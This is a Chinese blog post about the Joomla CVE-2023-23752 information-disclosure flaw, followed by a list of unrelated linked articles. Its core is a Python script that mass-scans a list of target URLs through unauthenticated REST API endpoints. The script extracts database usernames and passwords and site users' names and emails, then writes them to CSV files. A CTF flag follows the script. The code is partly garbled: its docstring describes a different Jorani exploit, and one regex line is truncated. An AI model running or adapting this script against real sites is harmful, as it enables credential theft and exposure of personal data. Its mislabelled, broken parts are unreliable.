饮长安千年月
饮长安千年月

CVE-2023-23752 Joomla 敏感信息泄露

简介

Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。

CVE-2023-23752 Joomla 敏感信息泄露_第1张图片

攻击脚本

"""
CVE-2023-23752 利用:Jorani 1.0.0 中的路径遍历与日志注入漏洞
该漏洞允许攻击者通过路径遍历访问日志文件并注入恶意代码,从而执行远程命令。
"""

import requests
import argparse
import csv
import json
import datetime
import sys
import re
import base64
import random
import string

# 禁用 SSL 不安全请求的警告
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# 定义日志输出的函数,带有颜色显示
def inGreen(s):
    return "\033[0;32m{}\033[0m".format(s)

def inYellow(s):
    return "\033[0;33m{}\033[0m".format(s)

# 定义日志、错误和消息输出函数
def msg(x, y="\n"):
    print(f'\x1b[92m[+]\x1b[0m {x}', end=y)

def err(x, y="\n"):
    print(f'\x1b[91m[x]\x1b[0m {x}', end=y)

def log(x, y="\n"):
    print(f'\x1b[93m[?]\x1b[0m {x}', end=y)

# 正则表达式,用于提取 CSRF 令牌和命令执行结果
CSRF_PATTERN = re.compile('"
PATH_TRAV_PAYLOAD = "../../application/logs"

# 全局变量,用于存储输出文件路径、代理设置和是否禁用颜色输出
output = ""
proxy = {}
notColor = False
timeout = 10  # 添加这行,设置请求超时时间为10秒

def readFile(filepath):
    """读取文件内容,返回每行数据的列表"""
    try:
        with open(filepath, encoding='utf8') as file:
            return file.readlines()
    except Exception as e:
        err(f"读取文件失败: {e}")
        sys.exit(1)

def writeFile(filepath, data):
    """将数据写入 CSV 文件"""
    try:
        with open(filepath, 'a', encoding='utf8', newline='') as file:
            filecsv = csv.writer(file)
            filecsv.writerow(data)
    except Exception as e:
        err(f"写入文件失败: {e}")

def reqDatabase(url):
    """请求数据库配置信息,并提取用户名和密码"""
    # 构造请求 URL
    if url.endswith("/"):
        api_url = f"{url}api/index.php/v1/config/application?public=true"
    else:
        api_url = f"{url}/api/index.php/v1/config/application?public=true"

    # 定义请求头
    headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close'
    }

    try:
        # 发送 GET 请求
        response = requests.get(api_url, headers=headers, verify=False, proxies=proxy, timeout=timeout)
        
        # 检查响应内容是否包含用户和密码信息
        if "links" in response.text and "\"password\":" in response.text:
            try:
                rejson = response.json()
                user = ""
                password = ""
                for dataone in rejson['data']:
                    attributes = dataone.get('attributes', {})
                    user = attributes.get('user', "")
                    password = attributes.get('password', "")
                if user or password:
                    printBody = f"[+] [Database]   {url} --> {user} / {password}"
                    if notColor:
                        print(printBody)
                    else:
                        print(inYellow(printBody))
                    if output.strip():
                        writeFile(f"{output}_databaseUserAndPassword.csv", [url, user, password, response.text])
                return url, response.text
            except json.JSONDecodeError:
                err("解析 JSON 失败")
    except requests.RequestException as e:
        err(f"请求数据库信息失败: {e}")

def reqUserAndEmail(url):
    """请求用户和邮箱信息,并提取用户名和邮箱"""
    # 构造请求 URL
    if url.endswith("/"):
        api_url = f"{url}api/index.php/v1/users?public=true"
    else:
        api_url = f"{url}/api/index.php/v1/users?public=true"

    # 定义请求头
    headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close'
    }

    try:
        # 发送 GET 请求
        response = requests.get(api_url, headers=headers, verify=False, proxies=proxy, timeout=timeout)
        
        # 检查响应内容是否包含用户名和邮箱信息
        if "username" in response.text and "email" in response.text:
            try:
                rejson = response.json()
                for dataone in rejson['data']:
                    attributes = dataone.get('attributes', {})
                    username = attributes.get('username', "")
                    email = attributes.get('email', "")
                    if username or email:
                        printBody = f"[+] [User&email] {url} --> {username} / {email}"
                        if notColor:
                            print(printBody)
                        else:
                            print(inGreen(printBody))
                        if output.strip():
                            writeFile(f"{output}_usernameAndEmail.csv", [url, username, email, response.text])
                return url, response.text
            except json.JSONDecodeError:
                err("解析 JSON 失败")
    except requests.RequestException as e:
        err(f"请求用户和邮箱信息失败: {e}")

def reqs(listfileName):
    """读取 URL 列表并依次执行数据库和用户信息请求"""
    urls = readFile(listfileName)
    for url in urls:
        url = url.strip()
        if not url:
            continue
        reqDatabase(url)
        reqUserAndEmail(url)

def main():
    """主函数,解析命令行参数并执行相应操作"""
    parser = argparse.ArgumentParser(description="Jorani 1.0.0 CVE-2023-23752 漏洞利用脚本")
    parser.add_argument('-u', '--url', type=str, default="", help="单个测试目标的 URL")
    parser.add_argument('-l', '--listfile', type=str, default="", help="包含测试目标 URL 的文件")
    parser.add_argument('-o', '--output', type=str, default="", help="输出文件的位置(不带扩展名)")
    parser.add_argument('-p', '--proxy', type=str, default="", help="代理地址,例如:http://localhost:1080")
    parser.add_argument('-nc', '--notColor', action='store_true', help="禁用带颜色的输出")

    opt = parser.parse_args()
    args = vars(opt)
    url = args['url']
    urlFileName = args['listfile']
    global output, proxy, notColor
    output = args['output']
    if args['proxy']:
        proxy['http'] = args['proxy']
        proxy['https'] = args['proxy']
    notColor = args['notColor']

    if url:
        reqDatabase(url)
        reqUserAndEmail(url)
    if urlFileName:
        reqs(urlFileName)

if __name__ == '__main__':
    main()

flag{e6923ba8-2e7d-4127-8300-93ea207e1868}

你可能感兴趣的:(日常靶场,网络安全)

  • 转行要趁早!网络安全行业人才缺口大,企业招聘需求正旺!
    网络安全行业具有人才缺口大、岗位选择多、薪资待遇好、学历要求不高等优势,对于想要转行的人员来说,是一个非常不错的选择。人才缺口大网络安全攻防技术手段日新月异,特别是现在人工智能技术飞速发展,网络安全形势复杂严峻,人才重要性凸显。教育部《网络安全人才实战能力白皮书》数据显示,到2027年,我国网络安全人员缺口将达327万。近期发布的《2024年网络安全产业人才发展报告》中提到,沿用ISC2的人才缺口
  • 【为什么网络安全缺口很大,而招聘却很少?】 网络安全工程师教学 安全黑客技术网络安全web安全网络安全游戏数据库
    为什么网络安全缺口很大,而招聘却很少?2020年我国网络空间安全人才数量缺口超过了140万,就业人数却只有10多万,缺口高达了93%。这里就有人会问了:1、网络安全行业为什么这么缺人?2、明明人才那么稀缺,为什么招聘时招安全的人员却没有那么多呢?首先来回答第一个问题,从政策背景、市场需求、行业现状来说。政策背景自从斯诺登棱镜门事件曝光之后,网络空间站成为现代战场第一战场,网络安全能力也被各国列为了
  • API测试(一):PortSwigger靶场笔记 h4ckb0ss 笔记网络安全web安全
    写在前面这篇文章是关于作者在学习PortSwigger的APITest类型漏洞时的记录和学习笔记使用到的工具为BurpSuitePro漏洞简介什么是apiAPI全称为ApplicationInterface,是应用程序对外提供功能的接口,现在主要有三种api风格,分别是JSON风格的api,RESTful风格的api以及Graphic风格的apiJSON风格请求获取用户信息POST/api/get
  • Python打卡训练营Day27 宸汐Fish_Heart Python打卡训练python算法开发语言
    @浙大疏锦行DAY27函数专题2:装饰器ps:第一期day27对应5月16日知识点回顾:1.装饰器的思想:进一步复用2.函数的装饰器写法3.注意内部函数的返回值作业:编写一个装饰器logger,在函数执行前后打印日志信息(如函数名、参数、返回值)昨天我们接触到了函数大部分的功能,然后在你日常ctrl点进某个复杂的项目,发现函数上方有一个@xxx,它就是装饰器装饰器本质上是一个Python函数,它可
  • 【Python系列PyCharm控制台pip install报错】如何解决pip安装报错ModuleNotFoundError: No module named ‘jieba’问题 lyzybbs 全栈Bug解决方案专栏pythonpycharmpipAI编程人工智能ide开发语言
    【Python系列PyCharm控制台pipinstall报错】如何解决pip安装报错ModuleNotFoundError:Nomodulenamed‘jieba’问题摘要在日常的Python开发中,ModuleNotFoundError:Nomodulenamed'jieba'是一个常见的错误提示。尤其是在使用PyCharm开发环境并在控制台中使用pipinstall命令安装第三方包时,更容易
  • NCSC发现针对FortiGate防火墙的隐蔽反向SSH与DoH后渗透工具 FreeBuf- ssh运维
    英国国家网络安全中心(NCSC)近日发现一款名为SHOERACK的新型恶意软件工具。这款后渗透恶意软件通过隐蔽的反向SSH隧道、自定义协议滥用和DNS-over-HTTPS(DoH)技术来维持远程访问并规避检测,引发了企业安全团队的高度警惕。恶意软件来源与功能该恶意软件最初在FortiGate100D系列防火墙上被发现,被认为是开源NHAS反向SSH工具的修改版本,但增加了显著的后渗透功能增强。分
  • 60天python训练计划----day55
    DAY55序列预测任务介绍知识点回顾序列预测介绍单步预测多步预测的2种方式序列数据的处理:滑动窗口多输入多输出任务的思路经典机器学习在序列任务上的劣势;以随机森林为例一、序列预测任务介绍1.1序列预测是什么?我们之前接触到的结构化数据,它本身不具备顺序,我们认为每个样本之间独立无关,样本之间即使调换顺序,仍然不影响模型的训练。但是日常中很多数据是存在先后关系的,而他们对应的任务是预测下一步的值,我
  • 21个MySQL索引优化实战技巧
    MySQL索引优化是提升数据库性能的关键手段,一个合理的索引设计和使用策略,往往能将查询速度提升几十倍甚至上百倍。然而,索引优化并不简单,既需要扎实的理论基础,也需要丰富的实战经验。本文总结了21个MySQL索引优化的实战技巧,从索引选择、设计到维护、监控的全生命周期,帮助你解决日常开发中的索引性能问题。基础知识回顾在具体介绍前,让我们先简单回顾索引的基础知识:MySQL常用的索引类型包括:主键索
  • 广东省第三届职业技能大赛网络安全项目模块B
    广东省第三届职业技能大赛网络安全项目模块B网络安全事件响应、数字取证调查和应用程序安全目录目录1模块B竞赛项目样题2介绍2所需的设备和材料2评分方案2项目和任务的描述2工作任务3第一部分网络安全事件响应3任务1:应急响应3本任务素材清单:WebServer服务器虚拟机(Linux或Windows操作系统)3第二部分数字取证调查3任务2:操作系统取证3本任务素材清单:内存镜像(*.vmem)、存储镜
  • spring boot项目整合mybatis实现多数据源的配置 张乔24 springboot整合第三方技术springbootjava多数据源
    在我们日常的开发中,经常会用到一个项目中使用多个数据源的问题,本次就带你了解怎样在springboot项目中使用mybatis整合多个数据源的示例。使用springboot3.5版本1、创建一个springboot项目,并引入相应的maven依赖com.github.xiaoyminknife4j-openapi3-jakarta-spring-boot-starter4.5.0org.sprin
  • MySQL从入门到精通(十):用户管理与安全 半夜偷你家裤衩子 MySqlmysql安全数据库
    本文是《MySQL从入门到精通》系列的第十篇,将深入探讨MySQL的用户管理与安全机制,包括用户账户创建、权限管理、加密连接、安全最佳实践等内容,帮助你构建一个安全可靠的数据库环境。文章目录MySQL安全基础用户账户管理权限系统详解角色管理密码管理与策略加密连接网络安全审计与日志安全最佳实践MySQL安全基础安全模型概述MySQL的安全模型基于用户账户和权限系统,遵循以下基本原则:身份验证:确认用
  • Java四种拷贝方式总结!一文扫清所有拷贝问题 小W求学之旅 javaspring拷贝大文件拷贝
    作为Java开发者,日常开发中经常会遇到数据拷贝的需求。最近在面试中也有被问到一次大文件拷贝,抽空专门总结一下,从基础概念到实战技巧,配合流程图,让原理和流程一目了然~一、浅拷贝VS深拷贝一开始做spring项目时,就被浅拷贝坑过。当时想复制一个对象,结果改了新对象的属性,老对象也跟着变了。后来才知道,这就是浅拷贝的“锅”。浅拷贝就像拍证件照,照片上的人看着和你一模一样,但本质上还是两张纸。Jav
  • Open VSX Registry关键漏洞使攻击者可完全控制Visual Studio Code扩展市场 FreeBuf- vscodeide编辑器
    网络安全研究人员近日披露了OpenVSXRegistry("open-vsx[.]org")中存在的一个关键漏洞。若被成功利用,攻击者可能完全控制整个VisualStudioCode扩展市场,造成严重的供应链风险。漏洞详情与潜在影响KoiSecurity研究员OrenYomtov表示:"该漏洞使攻击者能够完全控制整个扩展市场,进而控制数百万开发者的设备。通过利用持续集成(CI)问题,恶意行为者可以
  • App Store暗藏虚假抖音,内含间谍软件窃取照片和加密货币 FreeBuf- TikTokAppStoreiOSAndroid
    卡巴斯基网络安全研究人员近日发现名为SparkKitty的新型间谍软件活动,该恶意程序已感染苹果AppStore和谷歌Play官方商店的多个应用。这款间谍软件旨在窃取用户移动设备中的所有图片,疑似专门搜寻加密货币相关信息。该攻击活动自2024年初开始活跃,主要针对东南亚和中国用户。伪装流行应用渗透设备SparkKitty间谍软件通过看似无害的应用程序渗透设备,通常伪装成TikTok等流行应用的修改
  • ComfyUI遭“Pickai“C++后门攻击,全球700余台AI图像生成服务器沦陷 FreeBuf- c++人工智能服务器
    大规模AI基础设施遭遇定向攻击网络安全研究机构XLab近日发现针对ComfyUI框架的活跃攻击活动。ComfyUI是当前广泛用于部署大型AI图像生成模型的开源框架。攻击者通过该框架漏洞植入名为Pickai的C++后门程序,已导致全球近700台服务器失陷。中国国家网络安全通报中心于2025年5月27日发布高风险预警,敦促相关单位立即采取防御措施。XLab在技术分析报告中指出:"随着各行业私有化部署A
  • Java开发者必备:5个提升编码效率的实用技巧 Java鼠鼠吖 开发语言java
    导语在日常开发中,巧妙运用语言特性可以大幅提升代码质量和开发效率。本文分享5个经过验证的Java实用技巧,涵盖资源管理、集合操作和API设计等场景,附可直接复用的代码模板,帮助您写出更优雅健壮的代码。免费获取Java学习资料一、自动化资源管理技巧场景:传统try-finally代码冗长且易遗漏关闭操作改进方案://传统写法(易出错)FileInputStreamfis=null;try{fis=n
  • 科技如何影响我们的生活? 雪兽软件 科技前沿科技生活
    科技已成为我们生活中不可或缺的一部分,彻底改变了我们工作、沟通和生活的方式。从智能手机到智能家居,科技已渗透到我们生活的每个角落。无论是用手机闹钟开启新的一天,通过Alexa开关灯光,还是打开Uber或Lyft打车上班,都清晰表明:科技推动着世界运转。尽管我们对科技的依赖无可否认,但它在日常生活中无孔不入的融入也引发了一个问题:科技究竟真正帮助了我们什么?本文将探讨科技对我们生活的多方面影响,并审
  • C#最佳实践:考虑为类重写ToString()方法 阿蒙Armon C#最佳实践c#开发语言服务器java
    C#最佳实践:考虑为类重写ToString()方法在C#编程的日常开发中,ToString()方法是一个既基础又容易被忽视的重要成员。它是System.Object类的虚方法,所有类都继承自System.Object,这意味着每个类都拥有ToString()方法。然而,默认的ToString()方法往往无法满足实际需求,因此,考虑为类重写ToString()方法成为C#编程中的一项重要最佳实践。接
  • VUE3入门很简单(3)--- watch 有诺千金 Vue3vue.js前端javascript
    前言重要提示:文章只适合初学者,不适合专家!!!Vue3中的watch:数据变化的"眼睛"和"耳朵"想象你有一个超级助理,每当商店里的商品价格发生变化,它就会立即通知你。在Vue3中,watch就是这个聪明的小助理!一、为什么需要watch?数据变化的侦探在日常开发中,你会经常遇到这些情况:用户输入搜索词时,自动开始搜索表单数据变化时,自动保存草稿路由参数变化时,重新加载数据当选择地区变化时,重新
  • 2025最火专业解读:信息安全(非常详细)零基础入门到精通,收藏这一篇就够了 QXXXD 程序员网络安全兼职副业安全web安全高考网络运维
    信息安全专业每天认识一个专业1.什么是信息安全信息安全,简称信安,是指保持信息的保密性、完整性、可用性以及真实性、可核查性、不可否认性和可靠性等。信息安全,听起来“高大上”,似乎有点高深莫测,实际上我们一点也不陌生。在信息化的今天,我们接触到的信息安全实例比比皆是。比如我们日常使用的智能手机的指纹锁,身份证办理时录入的指纹,拥有“黑科技”的虹膜识别技术,支付宝等软件在线交易时生成的动态验证码,电脑
  • 研一自救指南 - 06.HTML5系统学习 东部欧安时 html5
    前情提要:研一自救指南-01.java面向对象(黑马)研1自救指南-02.Java+AI智能辅助编程(黑马)研一自救指南-03.面向面经预习(前端)研一自救指南-04.面试狂刷(前端日常实习)研一自救指南-05.JavaScript系统学习基于W3school的HTML5学习1.html元素html链接点击这里//图像换行横线2.html样式背景颜色、对齐方式设置字体、颜色、大小3.文本格式化Th
  • Ubuntu中常用的网络命令指南 心随_风动 Ubuntu系统ubuntu网络linux
    Ubuntu中常用的网络命令指南在Ubuntu系统中,网络管理是日常运维和故障排查的核心技能。️基础网络诊断ping-测试网络连通性pinggoogle.com#持续测试ping-c4google.com#发送4个包后停止traceroute/tracepath-追踪数据包路径traceroutegithub.comtracepathgithub.com#无需root权限mtr-实时网络质量分析(
  • 良品超市进销存管理系统设计与实现(开题报告、高质量、毕业设计、毕业论文) AA-老高(接毕设) 计算机专业课程设计人工智能javaspringmavenspringbootspringcloud
    毕业论文(设计)题目良品超市进销存管理系统设计与实现课题来源□科研R应用□教学□其它成果类别□论文R设计一、课题的研究意义选题的目的良品超市作为一家日益壮大的零售企业,面临着激烈的市场竞争和日益复杂的供应链管理。在当前的商业环境中,如何高效管理商品的进销存,降低运营成本,提高顾客满意度,已成为企业亟需解决的问题。传统的手工记录和简单的电子表格无法满足日常运营中的快速更新和数据分析需求,常常导致库存
  • iOS App 上架流程工具链解析:开发者视角下的协作实践总结 2501_91591841 httpudphttpswebsocket网络安全网络协议tcp/ip
    在我们最近完成的一个B2C健康管理类App项目中,有一个显著的特点:开发团队并不拥有统一的macOS环境。我们使用Flutter开发,一部分成员使用Windows,一部分使用Ubuntu,团队中仅有一台远程可用的Macmini作为打包主机。这次项目的iOS上架过程从准备证书、打包构建、上传提交,到信息维护与测试,每一个步骤都涉及多个工具协作。本文是从一个工程师的日常视角,拆解我们如何组合各类工具完
  • Redis大规模Key遍历实战:性能与安全的最佳实践 GO兔 redisredis安全数据库
    在Redis数据库的日常运维和开发过程中,我们经常需要遍历所有的key来执行各种操作,如统计、分析、迁移或清理数据。然而,在生产环境中,尤其是对于大型Redis实例,如何高效且安全地完成这一操作是一个重要的技术挑战。本文将详细介绍Redis中遍历所有key的各种方法、它们的优缺点以及最佳实践。目录为什么需要遍历Redis的所有key遍历方法及其工作原理KEYS命令SCAN命令其他相关命令各种方法的
  • Golang工具类集合:提升开发效率的实战利器 GO兔 golang开发语言后端
    作为一名Golang开发者,我们经常需要处理日期时间、字符串操作和进度显示等常见任务。今天我要向大家介绍一个实用的Golang工具类库,它包含了三个核心模块:dateutil、strutil和progressutil,旨在解决日常开发中的痛点问题,提升代码质量和开发效率。(抽取了工作中常用的一些工具类,日常使用频率较高,为了方便大家使用,特此抽取出来)项目概述这个工具类库的设计理念是"简洁、高效、
  • 2025学年湖北省职业院校技能大赛 “信息安全管理与评估”赛项 样题卷(五)
    2025学年湖北省职业院校技能大赛“信息安全管理与评估”赛项样题卷(五)第二部分:网络安全事件响应、数字取证调查、应用程序安全任务书任务1:应急响应(可以培训有答案)任务2:通信数据分析取证(40分)任务3:基于Windows计算机单机取证(120分)第三部分应用程序安全任务4:C代码审计(40分)第三部分:网络安全渗透、理论技能与职业素养任务一:门户网站(60分)可以培训任务二:办公系统(60分
  • 2025学年湖北省职业院校技能大赛 “信息安全管理与评估”赛项 样题卷(一) 落寞的魚丶 网络空间安全(职业技能大赛)#信息安全管理与评估赛项2025年湖北职业技能大赛信息安全评估赛项高职组赛题样题网安全配置
    2025学年湖北省职业院校技能大赛“信息安全管理与评估”赛项样题卷(一)第一部分:网络平台搭建与设备安全防护任务书DCRS:DCFW:DCWS:WAF:第二部分:网络安全事件响应、数字取证调查、应用程序安全任务书任务1:应急响应(可以培训有答案)任务2:通信数据分析取证(40分)任务3:基于Windows计算机单机取证(120分)第三部分应用程序安全任务4:Java代码审计(40分)第三部分:网络
  • 【信息安全管理与评估】2024年浙江省职业院校技能大赛高职组“信息安全管理与评估”赛项规程 2401_84302369 程序员web安全网络安全
    赛项归属产业:电子信息大类二、竞赛目的(一)引领教学改革通过本项目竞赛让参赛选手熟悉世界技能大赛网络安全项目的职业标准规范,检验参赛选手网络组建和安全运维、安全审计、网络安全应急响应、数字取证调查、应用程序安全和网络攻防渗透能力,检验参赛队计划组织和团队协作等综合职业素养,强调学生创新能力和实践能力培养,提升学生职业能力和就业质量。(二)强化专业建设该赛项衔接国家信息安全技术应用高职专业标准,竞赛
  • AI重塑IT行业:从效率工具到认知杠杆的人机协同进化之路 AI_DL_CODE 人工智能之深度学习人工智能IT行业变革人机协同AI伦理软件开发网络安全职业转型
    摘要:本文系统阐述AI技术对IT行业的革命性影响,揭示其作为"认知杠杆"而非"职业终结者"的本质。通过分析AI在软件开发、网络安全、数据决策等领域的应用实践,量化展示AI对编程效率(代码生成30%-50%)、测试周期(压缩40%)、故障修复时间(MTTR降低75%)等关键指标的提升。同时深入剖析人类在创新设计、伦理判断等维度的不可替代性,构建"AI处理确定性任务+人类主导价值创造"的双螺旋协作模型
  • jQuery 键盘事件keydown ,keypress ,keyup介绍 107x jsjquerykeydownkeypresskeyup
    本文章总结了下些关于jQuery 键盘事件keydown ,keypress ,keyup介绍,有需要了解的朋友可参考。 一、首先需要知道的是: 1、keydown() keydown事件会在键盘按下时触发. 2、keyup()  代码如下 复制代码 $('input').keyup(funciton(){      
  • AngularJS中的Promise bijian1013 JavaScriptAngularJSPromise
    一.Promise         Promise是一个接口,它用来处理的对象具有这样的特点:在未来某一时刻(主要是异步调用)会从服务端返回或者被填充属性。其核心是,promise是一个带有then()函数的对象。         为了展示它的优点,下面来看一个例子,其中需要获取用户当前的配置文件: var cu
  • c++ 用数组实现栈类 CrazyMizzz 数据结构C++
    #include<iostream> #include<cassert> using namespace std; template<class T, int SIZE = 50> class Stack{ private: T list[SIZE];//数组存放栈的元素 int top;//栈顶位置 public: Stack(
  • java和c语言的雷同 麦田的设计者 java递归scaner
    软件启动时的初始化代码,加载用户信息2015年5月27号 从头学java二 1、语言的三种基本结构:顺序、选择、循环。废话不多说,需要指出一下几点:      a、return语句的功能除了作为函数返回值以外,还起到结束本函数的功能,return后的语句 不会再继续执行。      b、for循环相比于whi
  • LINUX环境并发服务器的三种实现模型 被触发 linux
    服务器设计技术有很多,按使用的协议来分有TCP服务器和UDP服务器。按处理方式来分有循环服务器和并发服务器。 1  循环服务器与并发服务器模型 在网络程序里面,一般来说都是许多客户对应一个服务器,为了处理客户的请求,对服务端的程序就提出了特殊的要求。 目前最常用的服务器模型有: ·循环服务器:服务器在同一时刻只能响应一个客户端的请求 ·并发服务器:服
  • Oracle数据库查询指令 肆无忌惮_ oracle数据库
    20140920   单表查询 -- 查询************************************************************************************************************ -- 使用scott用户登录   -- 查看emp表   desc emp  
  • ext右下角浮动窗口 知了ing JavaScriptext
    第一种 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/
  • 浅谈REDIS数据库的键值设计 矮蛋蛋 redis
    http://www.cnblogs.com/aidandan/ 原文地址:http://www.hoterran.info/redis_kv_design 丰富的数据结构使得redis的设计非常的有趣。不像关系型数据库那样,DEV和DBA需要深度沟通,review每行sql语句,也不像memcached那样,不需要DBA的参与。redis的DBA需要熟悉数据结构,并能了解使用场景。
  • maven编译可执行jar包 alleni123 maven
    http://stackoverflow.com/questions/574594/how-can-i-create-an-executable-jar-with-dependencies-using-maven <build> <plugins> <plugin> <artifactId>maven-asse
  • 人力资源在现代企业中的作用 百合不是茶 HR 企业管理
    //人力资源在在企业中的作用人力资源为什么会存在,人力资源究竟是干什么的 人力资源管理是对管理模式一次大的创新,人力资源兴起的原因有以下点: 工业时代的国际化竞争,现代市场的风险管控等等。所以人力资源 在现代经济竞争中的优势明显的存在,人力资源在集团类公司中存在着 明显的优势(鸿海集团),有一次笔者亲自去体验过红海集团的招聘,只 知道人力资源是管理企业招聘的 当时我被招聘上了,当时给我们培训 的人
  • Linux自启动设置详解 bijian1013 linux
    linux有自己一套完整的启动体系,抓住了linux启动的脉络,linux的启动过程将不再神秘。 阅读之前建议先看一下附图。 本文中假设inittab中设置的init tree为: /etc/rc.d/rc0.d /etc/rc.d/rc1.d /etc/rc.d/rc2.d /etc/rc.d/rc3.d /etc/rc.d/rc4.d /etc/rc.d/rc5.d /etc
  • Spring Aop Schema实现 bijian1013 javaspringAOP
    本例使用的是Spring2.5 1.Aop配置文件spring-aop.xml <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmln
  • 【Gson七】Gson预定义类型适配器 bit1129 gson
    Gson提供了丰富的预定义类型适配器,在对象和JSON串之间进行序列化和反序列化时,指定对象和字符串之间的转换方式,   DateTypeAdapter   public final class DateTypeAdapter extends TypeAdapter<Date> { public static final TypeAdapterFacto
  • 【Spark八十八】Spark Streaming累加器操作(updateStateByKey) bit1129 update
    在实时计算的实际应用中,有时除了需要关心一个时间间隔内的数据,有时还可能会对整个实时计算的所有时间间隔内产生的相关数据进行统计。 比如: 对Nginx的access.log实时监控请求404时,有时除了需要统计某个时间间隔内出现的次数,有时还需要统计一整天出现了多少次404,也就是说404监控横跨多个时间间隔。   Spark Streaming的解决方案是累加器,工作原理是,定义
  • linux系统下通过shell脚本快速找到哪个进程在写文件 ronin47
    一个文件正在被进程写 我想查看这个进程 文件一直在增大 找不到谁在写 使用lsof也没找到 这个问题挺有普遍性的,解决方法应该很多,这里我给大家提个比较直观的方法。 linux下每个文件都会在某个块设备上存放,当然也都有相应的inode, 那么透过vfs.write我们就可以知道谁在不停的写入特定的设备上的inode。 幸运的是systemtap的安装包里带了inodewatch.stp,位
  • java-两种方法求第一个最长的可重复子串 bylijinnan java算法
    import java.util.Arrays; import java.util.Collections; import java.util.List; public class MaxPrefix { public static void main(String[] args) { String str="abbdabcdabcx";
  • Netty源码学习-ServerBootstrap启动及事件处理过程 bylijinnan javanetty
    Netty是采用了Reactor模式的多线程版本,建议先看下面这篇文章了解一下Reactor模式: http://bylijinnan.iteye.com/blog/1992325 Netty的启动及事件处理的流程,基本上是按照上面这篇文章来走的 文章里面提到的操作,每一步都能在Netty里面找到对应的代码 其中Reactor里面的Acceptor就对应Netty的ServerBo
  • servelt filter listener 的生命周期 cngolon filterlistenerservelt生命周期
    1. servlet    当第一次请求一个servlet资源时,servlet容器创建这个servlet实例,并调用他的 init(ServletConfig config)做一些初始化的工作,然后调用它的service方法处理请求。当第二次请求这个servlet资源时,servlet容器就不在创建实例,而是直接调用它的service方法处理请求,也就是说
  • jmpopups获取input元素值 ctrain JavaScript
    jmpopups 获取弹出层form表单 首先,我有一个div,里面包含了一个表单,默认是隐藏的,使用jmpopups时,会弹出这个隐藏的div,其实jmpopups是将我们的代码生成一份拷贝。 当我直接获取这个form表单中的文本框时,使用方法:$('#form input[name=test1]').val();这样是获取不到的。 我们必须到jmpopups生成的代码中去查找这个值,$(
  • vi查找替换命令详解 daizj linux正则表达式替换查找vim
    一、查找 查找命令 /pattern<Enter> :向下查找pattern匹配字符串 ?pattern<Enter>:向上查找pattern匹配字符串 使用了查找命令之后,使用如下两个键快速查找: n:按照同一方向继续查找 N:按照反方向查找 字符串匹配 pattern是需要匹配的字符串,例如: 1:  /abc<En
  • 对网站中的js,css文件进行打包 dcj3sjt126com PHP打包
    一,为什么要用smarty进行打包 apache中也有给js,css这样的静态文件进行打包压缩的模块,但是本文所说的不是以这种方式进行的打包,而是和smarty结合的方式来把网站中的js,css文件进行打包。 为什么要进行打包呢,主要目的是为了合理的管理自己的代码 。现在有好多网站,你查看一下网站的源码的话,你会发现网站的头部有大量的JS文件和CSS文件,网站的尾部也有可能有大量的J
  • php Yii: 出现undefined offset 或者 undefined index解决方案 dcj3sjt126com undefined
    在开发Yii 时,在程序中定义了如下方式:        if($this->menuoption[2] === 'test'),那么在运行程序时会报:undefined offset:2,这样的错误主要是由于php.ini 里的错误等级太高了,在windows下错误等级
  • linux 文件格式(1) sed工具 eksliang linuxlinux sed工具sed工具linux sed详解
    转载请出自出处: http://eksliang.iteye.com/blog/2106082 简介       sed 是一种在线编辑器,它一次处理一行内容。处理时,把当前处理的行存储在临时缓冲区中,称为“模式空间”(pattern space),接着用sed命令处理缓冲区中的内容,处理完成后,把缓冲区的内容送往屏幕。接着处理下一行,这样不断重复,直到文件末尾
  • Android应用程序获取系统权限 gqdy365 android
    引用 如何使Android应用程序获取系统权限         第一个方法简单点,不过需要在Android系统源码的环境下用make来编译:         1. 在应用程序的AndroidManifest.xml中的manifest节点
  • HoverTree开发日志之验证码 hvt .netC#asp.nethovertreewebform
    HoverTree是一个ASP.NET的开源CMS,目前包含文章系统,图库和留言板功能。代码完全开放,文章内容页生成了静态的HTM页面,留言板提供留言审核功能,文章可以发布HTML源代码,图片上传同时生成高品质缩略图。推出之后得到许多网友的支持,再此表示感谢!留言板不断收到许多有益留言,但同时也有不少广告,因此决定在提交留言页面增加验证码功能。ASP.NET验证码在网上找,如果不是很多,就是特别多
  • JSON API:用 JSON 构建 API 的标准指南中文版 justjavac json
    译文地址:https://github.com/justjavac/json-api-zh_CN 如果你和你的团队曾经争论过使用什么方式构建合理 JSON 响应格式, 那么 JSON API 就是你的 anti-bikeshedding 武器。 通过遵循共同的约定,可以提高开发效率,利用更普遍的工具,可以是你更加专注于开发重点:你的程序。 基于 JSON API 的客户端还能够充分利用缓存,
  • 数据结构随记_2 lx.asymmetric 数据结构笔记
    第三章 栈与队列 一.简答题 1. 在一个循环队列中,队首指针指向队首元素的  前一个    位置。  2.在具有n个单元的循环队列中,队满时共有  n-1  个元素。  3. 向栈中压入元素的操作是先  移动栈顶指针&n
  • Linux下的监控工具dstat 网络接口 linux
